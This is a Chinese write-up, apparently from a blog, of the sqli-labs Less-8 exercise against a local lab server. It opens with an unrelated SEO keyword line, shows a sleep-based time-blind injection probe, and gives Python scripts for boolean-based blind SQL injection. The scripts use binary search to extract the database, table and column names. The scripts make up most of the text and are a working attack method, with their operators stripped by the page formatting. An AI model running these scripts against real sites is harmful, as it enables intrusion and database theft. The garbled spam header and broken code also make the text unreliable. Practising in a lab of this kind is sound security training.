网站备案的好处,卖东西的小程序是怎么弄的,大学做视频网站设计,网站内容建设整改工作?id1 and sleep(2)--
发现页面存在注点#xff0c;使用时间盲注脚本进行注入---
import requestsdef inject_database(url):name #name用于存储猜测出的数据库名称 for i in range(1, 20): # 假设数据库名称长度不超过20low 48 # 0high 122 # zmiddle (low high…?id1 and sleep(2)--
发现页面存在注点使用时间盲注脚本进行注入---
import requestsdef inject_database(url):name #name用于存储猜测出的数据库名称 for i in range(1, 20): # 假设数据库名称长度不超过20low 48 # 0high 122 # zmiddle (low high) // 2 /*low, high, middle 用于二分查找(内层循环使用二分查找法猜测每个字符的ASCII值)*/while low high:#构造Payload: payload是SQL注入的有效载荷,尝试猜测当前字符的ASCII值payload 1 and ascii(substr(database(),%d,1))%d-- % (i, middle)params {id: payload}r requests.get(url, paramsparams) # 判断注入是否成功依据靶场的返回信息if You are in in r.text: # 只检查包含 You are in 的内容表示成功low middle 1else:high middlemiddle (low high) // 2 # 只拼接有效字符跳过空格ASCII 32和其他非打印字符if middle 32: # 跳过空格和不可打印字符name chr(middle)print(fCurrent database name: {name})low 48high 122middle (low high) // 2print(fFinal database name: {name})if __name__ __main__:url http://127.0.0.1/sqlilabs7/Less-8/index.phpinject_database(url)
用一个布尔盲注攻击从数据库中提取表名
-循环遍历表名的每个字符
-二分查找法通过ASCII码范围48到122进行二分查找确定每个字符的值
-构造SQL注入Payload利用substr函数和ascii函数逐字符比较表名的ASCII值
-发送请求并判断结果
-跳过空格和非打印字符只拼接有效的字符
import requestsdef inject_table_name(url, database_name):table_name for i in range(1, 20): low 48 # 0high 122 # zmiddle (low high) // 2while low high:# payloadpayload f1 and ascii(substr((select table_name from information_schema.tables where table_schema{database_name} limit 0,1),{i},1)){middle}-- params {id: payload}r requests.get(url, paramsparams)if You are in in r.text: low middle 1else:high middlemiddle (low high) // 2if middle 32: # 跳过空格和不可打印字符table_name chr(middle)print(table_name)low 48high 122middle (low high) // 2print(fFinal table name: {table_name})if __name__ __main__:url http://127.0.0.1/sqlilabs7/Less-8/index.php database_name security # 目标数据库名称inject_table_name(url, database_name) 通过payload猜测数据库表的列名
import requestsdef inject_column_name(url, database_name, table_name):column_name for i in range(1, 20): low 48 # 0high 122 # zmiddle (low high) // 2while low high:payload f1 and ascii(substr((select column_name from information_schema.columns where table_schema{database_name} and table_name{table_name} limit 0,1),{i},1)){middle}-- params {id: payload}r requests.get(url, paramsparams)if You are in in r.text: low middle 1else:high middlemiddle (low high) // 2if middle 32: column_name chr(middle)print(column_name)low 48high 122middle (low high) // 2print(fFinal column name: {column_name})if __name__ __main__:url http://127.0.0.1/sqlilabs7/Less-8/index.php database_name security table_name users # 目标表名inject_column_name(url, database_name, table_name)
